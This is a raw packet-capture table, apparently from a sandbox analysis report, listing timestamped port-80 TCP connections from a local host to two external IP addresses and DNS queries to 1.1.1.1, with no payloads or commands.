                                            Oct 19, 2024 06:43:49.520750999 CEST8050016123.213.233.131192.168.2.4
                                            Oct 19, 2024 06:43:49.520870924 CEST5001680192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:43:49.520956993 CEST5001680192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:43:49.525943995 CEST8050016123.213.233.131192.168.2.4
                                            Oct 19, 2024 06:43:49.721970081 CEST5001780192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:43:49.726937056 CEST8050017123.213.233.131192.168.2.4
                                            Oct 19, 2024 06:43:49.727020979 CEST5001780192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:43:49.727139950 CEST5001780192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:43:49.727173090 CEST5001780192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:43:49.731945038 CEST8050017123.213.233.131192.168.2.4
                                            Oct 19, 2024 06:43:49.732050896 CEST8050017123.213.233.131192.168.2.4
                                            Oct 19, 2024 06:43:50.849469900 CEST8050017123.213.233.131192.168.2.4
                                            Oct 19, 2024 06:43:50.849582911 CEST5001780192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:43:50.849636078 CEST5001780192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:43:50.854505062 CEST8050017123.213.233.131192.168.2.4
                                            Oct 19, 2024 06:43:51.031574011 CEST5001880192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:43:51.037013054 CEST8050018123.213.233.131192.168.2.4
                                            Oct 19, 2024 06:43:51.037092924 CEST5001880192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:43:51.037252903 CEST5001880192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:43:51.037280083 CEST5001880192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:43:51.042521000 CEST8050018123.213.233.131192.168.2.4
                                            Oct 19, 2024 06:43:51.042537928 CEST8050018123.213.233.131192.168.2.4
                                            Oct 19, 2024 06:43:52.110703945 CEST8050018123.213.233.131192.168.2.4
                                            Oct 19, 2024 06:43:52.112051010 CEST5001880192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:43:52.112152100 CEST5001880192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:43:52.117105007 CEST8050018123.213.233.131192.168.2.4
                                            Oct 19, 2024 06:43:52.816726923 CEST5001980192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:43:52.821708918 CEST8050019123.213.233.131192.168.2.4
                                            Oct 19, 2024 06:43:52.821815968 CEST5001980192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:43:52.821947098 CEST5001980192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:43:52.823015928 CEST5001980192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:43:52.826947927 CEST8050019123.213.233.131192.168.2.4
                                            Oct 19, 2024 06:43:52.827867985 CEST8050019123.213.233.131192.168.2.4
                                            Oct 19, 2024 06:43:53.952177048 CEST8050019123.213.233.131192.168.2.4
                                            Oct 19, 2024 06:43:53.952244997 CEST5001980192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:43:53.952305079 CEST5001980192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:43:53.957182884 CEST8050019123.213.233.131192.168.2.4
                                            Oct 19, 2024 06:43:54.412265062 CEST5002080192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:43:54.417241096 CEST8050020123.213.233.131192.168.2.4
                                            Oct 19, 2024 06:43:54.417332888 CEST5002080192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:43:54.417454004 CEST5002080192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:43:54.419017076 CEST5002080192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:43:54.422204018 CEST8050020123.213.233.131192.168.2.4
                                            Oct 19, 2024 06:43:54.423758030 CEST8050020123.213.233.131192.168.2.4
                                            Oct 19, 2024 06:43:55.523525000 CEST8050020123.213.233.131192.168.2.4
                                            Oct 19, 2024 06:43:55.523729086 CEST5002080192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:43:55.523770094 CEST5002080192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:43:55.528590918 CEST8050020123.213.233.131192.168.2.4
                                            Oct 19, 2024 06:43:55.953875065 CEST5002180192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:43:55.958820105 CEST8050021123.213.233.131192.168.2.4
                                            Oct 19, 2024 06:43:55.958914995 CEST5002180192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:43:55.959076881 CEST5002180192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:43:55.959129095 CEST5002180192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:43:55.964027882 CEST8050021123.213.233.131192.168.2.4
                                            Oct 19, 2024 06:43:55.964036942 CEST8050021123.213.233.131192.168.2.4
                                            Oct 19, 2024 06:43:57.079065084 CEST8050021123.213.233.131192.168.2.4
                                            Oct 19, 2024 06:43:57.079165936 CEST5002180192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:43:57.079245090 CEST5002180192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:43:57.084207058 CEST8050021123.213.233.131192.168.2.4
                                            Oct 19, 2024 06:43:57.490047932 CEST5002280192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:43:57.494955063 CEST8050022123.213.233.131192.168.2.4
                                            Oct 19, 2024 06:43:57.495136976 CEST5002280192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:43:57.495244980 CEST5002280192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:43:57.495289087 CEST5002280192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:43:57.499986887 CEST8050022123.213.233.131192.168.2.4
                                            Oct 19, 2024 06:43:57.500143051 CEST8050022123.213.233.131192.168.2.4
                                            Oct 19, 2024 06:43:58.583332062 CEST8050022123.213.233.131192.168.2.4
                                            Oct 19, 2024 06:43:58.583451986 CEST5002280192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:43:58.585477114 CEST5002280192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:43:58.590246916 CEST8050022123.213.233.131192.168.2.4
                                            Oct 19, 2024 06:43:58.866991997 CEST5002380192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:43:58.871927023 CEST8050023123.213.233.131192.168.2.4
                                            Oct 19, 2024 06:43:58.872003078 CEST5002380192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:43:58.872142076 CEST5002380192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:43:58.872153044 CEST5002380192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:43:58.876857042 CEST8050023123.213.233.131192.168.2.4
                                            Oct 19, 2024 06:43:58.877078056 CEST8050023123.213.233.131192.168.2.4
                                            Oct 19, 2024 06:43:59.965219021 CEST8050023123.213.233.131192.168.2.4
                                            Oct 19, 2024 06:43:59.965280056 CEST5002380192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:43:59.965312004 CEST5002380192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:43:59.970129967 CEST8050023123.213.233.131192.168.2.4
                                            Oct 19, 2024 06:44:00.163891077 CEST5002480192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:44:00.168879032 CEST8050024123.213.233.131192.168.2.4
                                            Oct 19, 2024 06:44:00.169087887 CEST5002480192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:44:00.169258118 CEST5002480192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:44:00.169302940 CEST5002480192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:44:00.174067974 CEST8050024123.213.233.131192.168.2.4
                                            Oct 19, 2024 06:44:00.174206972 CEST8050024123.213.233.131192.168.2.4
                                            Oct 19, 2024 06:44:01.281676054 CEST8050024123.213.233.131192.168.2.4
                                            Oct 19, 2024 06:44:01.281771898 CEST5002480192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:44:01.281771898 CEST5002480192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:44:01.286753893 CEST8050024123.213.233.131192.168.2.4
                                            Oct 19, 2024 06:44:06.409543991 CEST5002580192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:44:06.414447069 CEST8050025123.213.233.131192.168.2.4
                                            Oct 19, 2024 06:44:06.414510012 CEST5002580192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:44:06.414633989 CEST5002580192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:44:06.414633989 CEST5002580192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:44:06.419445992 CEST8050025123.213.233.131192.168.2.4
                                            Oct 19, 2024 06:44:06.419497967 CEST8050025123.213.233.131192.168.2.4
                                            Oct 19, 2024 06:44:07.514636993 CEST8050025123.213.233.131192.168.2.4
                                            Oct 19, 2024 06:44:07.514715910 CEST5002580192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:44:07.514786959 CEST5002580192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:44:07.519659042 CEST8050025123.213.233.131192.168.2.4
                                            Oct 19, 2024 06:44:11.825265884 CEST5002680192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:44:11.830065966 CEST8050026123.213.233.131192.168.2.4
                                            Oct 19, 2024 06:44:11.830152035 CEST5002680192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:44:11.830302000 CEST5002680192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:44:11.830326080 CEST5002680192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:44:11.835066080 CEST8050026123.213.233.131192.168.2.4
                                            Oct 19, 2024 06:44:11.835083961 CEST8050026123.213.233.131192.168.2.4
                                            Oct 19, 2024 06:44:12.945704937 CEST8050026123.213.233.131192.168.2.4
                                            Oct 19, 2024 06:44:12.945954084 CEST5002680192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:44:12.945954084 CEST5002680192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:44:12.950871944 CEST8050026123.213.233.131192.168.2.4
                                            Oct 19, 2024 06:44:17.791687965 CEST5002780192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:44:17.796751976 CEST8050027123.213.233.131192.168.2.4
                                            Oct 19, 2024 06:44:17.796837091 CEST5002780192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:44:17.796960115 CEST5002780192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:44:17.796978951 CEST5002780192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:44:17.801753998 CEST8050027123.213.233.131192.168.2.4
                                            Oct 19, 2024 06:44:17.801858902 CEST8050027123.213.233.131192.168.2.4
                                            Oct 19, 2024 06:44:18.934892893 CEST8050027123.213.233.131192.168.2.4
                                            Oct 19, 2024 06:44:18.935051918 CEST5002780192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:44:18.935137033 CEST5002780192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:44:18.939996958 CEST8050027123.213.233.131192.168.2.4
                                            Oct 19, 2024 06:44:23.948446035 CEST5002880192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:44:23.953391075 CEST8050028123.213.233.131192.168.2.4
                                            Oct 19, 2024 06:44:23.953454971 CEST5002880192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:44:23.953608990 CEST5002880192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:44:23.953627110 CEST5002880192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:44:23.958453894 CEST8050028123.213.233.131192.168.2.4
                                            Oct 19, 2024 06:44:23.958482981 CEST8050028123.213.233.131192.168.2.4
                                            Oct 19, 2024 06:44:25.042648077 CEST8050028123.213.233.131192.168.2.4
                                            Oct 19, 2024 06:44:25.042915106 CEST5002880192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:44:25.043178082 CEST5002880192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:44:25.047956944 CEST8050028123.213.233.131192.168.2.4
                                            Oct 19, 2024 06:44:29.524445057 CEST5002980192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:44:29.529319048 CEST8050029123.213.233.131192.168.2.4
                                            Oct 19, 2024 06:44:29.529397011 CEST5002980192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:44:29.529582977 CEST5002980192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:44:29.529627085 CEST5002980192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:44:29.534497023 CEST8050029123.213.233.131192.168.2.4
                                            Oct 19, 2024 06:44:29.534626961 CEST8050029123.213.233.131192.168.2.4
                                            Oct 19, 2024 06:44:30.639116049 CEST8050029123.213.233.131192.168.2.4
                                            Oct 19, 2024 06:44:30.639250040 CEST5002980192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:44:30.663470030 CEST5002980192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:44:30.668329000 CEST8050029123.213.233.131192.168.2.4
                                            Oct 19, 2024 06:44:35.725434065 CEST5003080192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:44:35.730365038 CEST8050030123.213.233.131192.168.2.4
                                            Oct 19, 2024 06:44:35.730431080 CEST5003080192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:44:35.730554104 CEST5003080192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:44:35.730586052 CEST5003080192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:44:35.735404968 CEST8050030123.213.233.131192.168.2.4
                                            Oct 19, 2024 06:44:35.735547066 CEST8050030123.213.233.131192.168.2.4
                                            Oct 19, 2024 06:44:36.825098038 CEST8050030123.213.233.131192.168.2.4
                                            Oct 19, 2024 06:44:36.825190067 CEST5003080192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:44:36.825268984 CEST5003080192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:44:36.830105066 CEST8050030123.213.233.131192.168.2.4
                                            Oct 19, 2024 06:44:41.920255899 CEST5003180192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:44:41.925215006 CEST8050031123.213.233.131192.168.2.4
                                            Oct 19, 2024 06:44:41.925297976 CEST5003180192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:44:41.925421953 CEST5003180192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:44:41.925450087 CEST5003180192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:44:41.930213928 CEST8050031123.213.233.131192.168.2.4
                                            Oct 19, 2024 06:44:41.930355072 CEST8050031123.213.233.131192.168.2.4
                                            Oct 19, 2024 06:44:43.048300028 CEST8050031123.213.233.131192.168.2.4
                                            Oct 19, 2024 06:44:43.048365116 CEST5003180192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:44:43.048397064 CEST5003180192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:44:43.053646088 CEST8050031123.213.233.131192.168.2.4
                                            Oct 19, 2024 06:44:47.590974092 CEST5003280192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:44:47.595793009 CEST8050032123.213.233.131192.168.2.4
                                            Oct 19, 2024 06:44:47.595860958 CEST5003280192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:44:47.595964909 CEST5003280192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:44:47.596019030 CEST5003280192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:44:47.600755930 CEST8050032123.213.233.131192.168.2.4
                                            Oct 19, 2024 06:44:47.600913048 CEST8050032123.213.233.131192.168.2.4
                                            Oct 19, 2024 06:44:48.684273005 CEST8050032123.213.233.131192.168.2.4
                                            Oct 19, 2024 06:44:48.684366941 CEST5003280192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:44:48.684442997 CEST5003280192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:44:48.689416885 CEST8050032123.213.233.131192.168.2.4
                                            Oct 19, 2024 06:44:53.429882050 CEST5003380192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:44:53.434947014 CEST8050033123.213.233.131192.168.2.4
                                            Oct 19, 2024 06:44:53.435044050 CEST5003380192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:44:53.435223103 CEST5003380192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:44:53.435261965 CEST5003380192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:44:53.440068007 CEST8050033123.213.233.131192.168.2.4
                                            Oct 19, 2024 06:44:53.440223932 CEST8050033123.213.233.131192.168.2.4
                                            Oct 19, 2024 06:44:54.566488028 CEST8050033123.213.233.131192.168.2.4
                                            Oct 19, 2024 06:44:54.566602945 CEST5003380192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:44:54.566672087 CEST5003380192.168.2.4123.213.233.131
                                            Oct 19, 2024 06:44:54.571535110 CEST8050033123.213.233.131192.168.2.4
                                            Oct 19, 2024 06:44:58.968638897 CEST5003480192.168.2.4116.58.10.60
                                            Oct 19, 2024 06:44:58.973572016 CEST8050034116.58.10.60192.168.2.4
                                            Oct 19, 2024 06:44:58.973670959 CEST5003480192.168.2.4116.58.10.60
                                            Oct 19, 2024 06:44:58.973855972 CEST5003480192.168.2.4116.58.10.60
                                            Oct 19, 2024 06:44:58.973910093 CEST5003480192.168.2.4116.58.10.60
                                            Oct 19, 2024 06:44:58.978718996 CEST8050034116.58.10.60192.168.2.4
                                            Oct 19, 2024 06:44:58.978852034 CEST8050034116.58.10.60192.168.2.4
                                            Oct 19, 2024 06:45:00.322999001 CEST8050034116.58.10.60192.168.2.4
                                            Oct 19, 2024 06:45:00.323081970 CEST5003480192.168.2.4116.58.10.60
                                            Oct 19, 2024 06:45:00.323163986 CEST5003480192.168.2.4116.58.10.60
                                            Oct 19, 2024 06:45:00.328069925 CEST8050034116.58.10.60192.168.2.4
                                            Oct 19, 2024 06:45:05.619326115 CEST5003580192.168.2.4116.58.10.60
                                            Oct 19, 2024 06:45:05.624557018 CEST8050035116.58.10.60192.168.2.4
                                            Oct 19, 2024 06:45:05.624726057 CEST5003580192.168.2.4116.58.10.60
                                            Oct 19, 2024 06:45:05.624799967 CEST5003580192.168.2.4116.58.10.60
                                            Oct 19, 2024 06:45:05.624835014 CEST5003580192.168.2.4116.58.10.60
                                            Oct 19, 2024 06:45:05.629607916 CEST8050035116.58.10.60192.168.2.4
                                            Oct 19, 2024 06:45:05.629853010 CEST8050035116.58.10.60192.168.2.4
                                            Oct 19, 2024 06:45:06.946711063 CEST8050035116.58.10.60192.168.2.4
                                            Oct 19, 2024 06:45:06.946810007 CEST5003580192.168.2.4116.58.10.60
                                            Oct 19, 2024 06:45:06.946845055 CEST5003580192.168.2.4116.58.10.60
                                            Oct 19, 2024 06:45:06.951733112 CEST8050035116.58.10.60192.168.2.4
                                            Oct 19, 2024 06:45:11.774388075 CEST5003680192.168.2.4116.58.10.60
                                            Oct 19, 2024 06:45:11.779227972 CEST8050036116.58.10.60192.168.2.4
                                            Oct 19, 2024 06:45:11.779335022 CEST5003680192.168.2.4116.58.10.60
                                            Oct 19, 2024 06:45:11.779484987 CEST5003680192.168.2.4116.58.10.60
                                            Oct 19, 2024 06:45:11.779517889 CEST5003680192.168.2.4116.58.10.60
                                            Oct 19, 2024 06:45:11.784290075 CEST8050036116.58.10.60192.168.2.4
                                            Oct 19, 2024 06:45:11.784306049 CEST8050036116.58.10.60192.168.2.4
                                            Oct 19, 2024 06:45:13.109616041 CEST8050036116.58.10.60192.168.2.4
                                            Oct 19, 2024 06:45:13.109708071 CEST5003680192.168.2.4116.58.10.60
                                            Oct 19, 2024 06:45:13.109790087 CEST5003680192.168.2.4116.58.10.60
                                            Oct 19, 2024 06:45:13.114765882 CEST8050036116.58.10.60192.168.2.4
                                            Oct 19, 2024 06:45:18.422658920 CEST5003780192.168.2.4116.58.10.60
                                            Oct 19, 2024 06:45:18.431857109 CEST8050037116.58.10.60192.168.2.4
                                            Oct 19, 2024 06:45:18.431950092 CEST5003780192.168.2.4116.58.10.60
                                            Oct 19, 2024 06:45:18.432126045 CEST5003780192.168.2.4116.58.10.60
                                            Oct 19, 2024 06:45:18.432161093 CEST5003780192.168.2.4116.58.10.60
                                            Oct 19, 2024 06:45:18.441935062 CEST8050037116.58.10.60192.168.2.4
                                            Oct 19, 2024 06:45:18.446175098 CEST8050037116.58.10.60192.168.2.4
                                            Oct 19, 2024 06:45:19.786210060 CEST8050037116.58.10.60192.168.2.4
                                            Oct 19, 2024 06:45:19.786287069 CEST5003780192.168.2.4116.58.10.60
                                            Oct 19, 2024 06:45:19.786952972 CEST5003780192.168.2.4116.58.10.60
                                            Oct 19, 2024 06:45:19.795475006 CEST8050037116.58.10.60192.168.2.4
                                            Oct 19, 2024 06:45:24.736581087 CEST5003880192.168.2.4116.58.10.60
                                            Oct 19, 2024 06:45:24.746570110 CEST8050038116.58.10.60192.168.2.4
                                            Oct 19, 2024 06:45:24.746635914 CEST5003880192.168.2.4116.58.10.60
                                            Oct 19, 2024 06:45:24.746797085 CEST5003880192.168.2.4116.58.10.60
                                            Oct 19, 2024 06:45:24.746833086 CEST5003880192.168.2.4116.58.10.60
                                            Oct 19, 2024 06:45:24.756546974 CEST8050038116.58.10.60192.168.2.4
                                            Oct 19, 2024 06:45:24.760447025 CEST8050038116.58.10.60192.168.2.4
                                            Oct 19, 2024 06:45:26.127265930 CEST8050038116.58.10.60192.168.2.4
                                            Oct 19, 2024 06:45:26.127377987 CEST5003880192.168.2.4116.58.10.60
                                            Oct 19, 2024 06:45:26.127485037 CEST5003880192.168.2.4116.58.10.60
                                            Oct 19, 2024 06:45:26.133923054 CEST8050038116.58.10.60192.168.2.4
                                            Oct 19, 2024 06:45:31.540827036 CEST5003980192.168.2.4116.58.10.60
                                            Oct 19, 2024 06:45:31.551846027 CEST8050039116.58.10.60192.168.2.4
                                            Oct 19, 2024 06:45:31.551944017 CEST5003980192.168.2.4116.58.10.60
                                            Oct 19, 2024 06:45:31.552082062 CEST5003980192.168.2.4116.58.10.60
                                            Oct 19, 2024 06:45:31.552139997 CEST5003980192.168.2.4116.58.10.60
                                            Oct 19, 2024 06:45:31.562463045 CEST8050039116.58.10.60192.168.2.4
                                            Oct 19, 2024 06:45:31.562493086 CEST8050039116.58.10.60192.168.2.4
                                            Oct 19, 2024 06:45:32.897641897 CEST8050039116.58.10.60192.168.2.4
                                            Oct 19, 2024 06:45:32.897717953 CEST5003980192.168.2.4116.58.10.60
                                            Oct 19, 2024 06:45:32.897763968 CEST5003980192.168.2.4116.58.10.60
                                            Oct 19, 2024 06:45:32.905973911 CEST8050039116.58.10.60192.168.2.4
                                            Oct 19, 2024 06:45:37.859927893 CEST5004080192.168.2.4116.58.10.60
                                            Oct 19, 2024 06:45:37.867314100 CEST8050040116.58.10.60192.168.2.4
                                            Oct 19, 2024 06:45:37.867393970 CEST5004080192.168.2.4116.58.10.60
                                            Oct 19, 2024 06:45:37.867525101 CEST5004080192.168.2.4116.58.10.60
                                            Oct 19, 2024 06:45:37.867558002 CEST5004080192.168.2.4116.58.10.60
                                            Oct 19, 2024 06:45:37.875444889 CEST8050040116.58.10.60192.168.2.4
                                            Oct 19, 2024 06:45:37.875475883 CEST8050040116.58.10.60192.168.2.4
                                            Oct 19, 2024 06:45:39.218147039 CEST8050040116.58.10.60192.168.2.4
                                            Oct 19, 2024 06:45:39.218290091 CEST5004080192.168.2.4116.58.10.60
                                            Oct 19, 2024 06:45:39.218333960 CEST5004080192.168.2.4116.58.10.60
                                            Oct 19, 2024 06:45:39.228147984 CEST8050040116.58.10.60192.168.2.4
                                            Oct 19, 2024 06:45:43.991055965 CEST5004180192.168.2.4116.58.10.60
                                            Oct 19, 2024 06:45:43.996644974 CEST8050041116.58.10.60192.168.2.4
                                            Oct 19, 2024 06:45:43.996730089 CEST5004180192.168.2.4116.58.10.60
                                            Oct 19, 2024 06:45:43.996870041 CEST5004180192.168.2.4116.58.10.60
                                            Oct 19, 2024 06:45:43.996893883 CEST5004180192.168.2.4116.58.10.60
                                            Oct 19, 2024 06:45:44.002635956 CEST8050041116.58.10.60192.168.2.4
                                            Oct 19, 2024 06:45:44.003681898 CEST8050041116.58.10.60192.168.2.4
                                            Oct 19, 2024 06:45:45.340089083 CEST8050041116.58.10.60192.168.2.4
                                            Oct 19, 2024 06:45:45.340212107 CEST5004180192.168.2.4116.58.10.60
                                            Oct 19, 2024 06:45:45.341804981 CEST5004180192.168.2.4116.58.10.60
                                            Oct 19, 2024 06:45:45.353017092 CEST8050041116.58.10.60192.168.2.4
                                            Oct 19, 2024 06:45:50.862325907 CEST6168480192.168.2.4116.58.10.60
                                            Oct 19, 2024 06:45:50.869719028 CEST8061684116.58.10.60192.168.2.4
                                            Oct 19, 2024 06:45:50.869800091 CEST6168480192.168.2.4116.58.10.60
                                            Oct 19, 2024 06:45:50.869941950 CEST6168480192.168.2.4116.58.10.60
                                            Oct 19, 2024 06:45:50.869941950 CEST6168480192.168.2.4116.58.10.60
                                            Oct 19, 2024 06:45:50.877536058 CEST8061684116.58.10.60192.168.2.4
                                            Oct 19, 2024 06:45:50.879879951 CEST8061684116.58.10.60192.168.2.4
                                            Oct 19, 2024 06:45:52.201960087 CEST8061684116.58.10.60192.168.2.4
                                            Oct 19, 2024 06:45:52.202083111 CEST6168480192.168.2.4116.58.10.60
                                            Oct 19, 2024 06:45:52.202169895 CEST6168480192.168.2.4116.58.10.60
                                            Oct 19, 2024 06:45:52.210602045 CEST8061684116.58.10.60192.168.2.4
                                            Oct 19, 2024 06:45:57.431236982 CEST6168580192.168.2.4116.58.10.60
                                            Oct 19, 2024 06:45:57.441242933 CEST8061685116.58.10.60192.168.2.4
                                            Oct 19, 2024 06:45:57.441338062 CEST6168580192.168.2.4116.58.10.60
                                            Oct 19, 2024 06:45:57.441528082 CEST6168580192.168.2.4116.58.10.60
                                            Oct 19, 2024 06:45:57.441571951 CEST6168580192.168.2.4116.58.10.60
                                            Oct 19, 2024 06:45:57.451409101 CEST8061685116.58.10.60192.168.2.4
                                            Oct 19, 2024 06:45:57.456542015 CEST8061685116.58.10.60192.168.2.4
                                            Oct 19, 2024 06:45:58.797473907 CEST8061685116.58.10.60192.168.2.4
                                            Oct 19, 2024 06:45:58.797573090 CEST6168580192.168.2.4116.58.10.60
                                            Oct 19, 2024 06:45:58.797662973 CEST6168580192.168.2.4116.58.10.60
                                            Oct 19, 2024 06:45:58.803745985 CEST8061685116.58.10.60192.168.2.4
                                            Oct 19, 2024 06:46:05.405811071 CEST6168680192.168.2.4116.58.10.60
                                            Oct 19, 2024 06:46:05.412285089 CEST8061686116.58.10.60192.168.2.4
                                            Oct 19, 2024 06:46:05.412379026 CEST6168680192.168.2.4116.58.10.60
                                            Oct 19, 2024 06:46:05.412533998 CEST6168680192.168.2.4116.58.10.60
                                            Oct 19, 2024 06:46:05.412570000 CEST6168680192.168.2.4116.58.10.60
                                            Oct 19, 2024 06:46:05.420882940 CEST8061686116.58.10.60192.168.2.4
                                            Oct 19, 2024 06:46:05.424128056 CEST8061686116.58.10.60192.168.2.4
                                            Oct 19, 2024 06:46:06.755083084 CEST8061686116.58.10.60192.168.2.4
                                            Oct 19, 2024 06:46:06.755172968 CEST6168680192.168.2.4116.58.10.60
                                            Oct 19, 2024 06:46:06.755274057 CEST6168680192.168.2.4116.58.10.60
                                            Oct 19, 2024 06:46:06.760132074 CEST8061686116.58.10.60192.168.2.4
                                            TimestampSource PortDest PortSource IPDest IP
                                            Oct 19, 2024 06:42:22.519059896 CEST4919053192.168.2.41.1.1.1
                                            Oct 19, 2024 06:42:22.786690950 CEST53491901.1.1.1192.168.2.4
                                            Oct 19, 2024 06:42:22.789664030 CEST5198553192.168.2.41.1.1.1
                                            Oct 19, 2024 06:42:22.798180103 CEST53519851.1.1.1192.168.2.4
                                            Oct 19, 2024 06:42:22.800153017 CEST6223053192.168.2.41.1.1.1
                                            Oct 19, 2024 06:42:23.805304050 CEST6223053192.168.2.41.1.1.1
                                            Oct 19, 2024 06:42:24.803971052 CEST6223053192.168.2.41.1.1.1
                                            Oct 19, 2024 06:42:25.007183075 CEST53622301.1.1.1192.168.2.4
                                            Oct 19, 2024 06:42:25.007201910 CEST53622301.1.1.1192.168.2.4
                                            Oct 19, 2024 06:42:25.007211924 CEST53622301.1.1.1192.168.2.4
                                            Oct 19, 2024 06:43:30.912147045 CEST4931153192.168.2.41.1.1.1
                                            Oct 19, 2024 06:43:31.060017109 CEST53493111.1.1.1192.168.2.4
                                            Oct 19, 2024 06:43:31.062853098 CEST6099653192.168.2.41.1.1.1
                                            Oct 19, 2024 06:43:31.071732044 CEST53609961.1.1.1192.168.2.4
                                            Oct 19, 2024 06:43:36.125165939 CEST5997853192.168.2.41.1.1.1
                                            Oct 19, 2024 06:43:36.173964024 CEST53599781.1.1.1192.168.2.4
                                            Oct 19, 2024 06:43:36.176858902 CEST6155953192.168.2.41.1.1.1
                                            Oct 19, 2024 06:43:36.195174932 CEST53615591.1.1.1192.168.2.4
                                            Oct 19, 2024 06:43:41.562773943 CEST4934253192.168.2.41.1.1.1
                                            Oct 19, 2024 06:43:41.609564066 CEST53493421.1.1.1192.168.2.4
                                            Oct 19, 2024 06:43:41.612140894 CEST5804853192.168.2.41.1.1.1
                                            Oct 19, 2024 06:43:41.620878935 CEST53580481.1.1.1192.168.2.4
                                            Oct 19, 2024 06:43:47.169883966 CEST5577953192.168.2.41.1.1.1
                                            Oct 19, 2024 06:43:47.218054056 CEST53557791.1.1.1192.168.2.4
                                            Oct 19, 2024 06:43:47.236016989 CEST5145153192.168.2.41.1.1.1
                                            Oct 19, 2024 06:43:47.245474100 CEST53514511.1.1.1192.168.2.4
                                            Oct 19, 2024 06:43:52.408652067 CEST6407353192.168.2.41.1.1.1
                                            Oct 19, 2024 06:43:52.678066969 CEST53640731.1.1.1192.168.2.4
                                            Oct 19, 2024 06:43:52.685308933 CEST5111053192.168.2.41.1.1.1
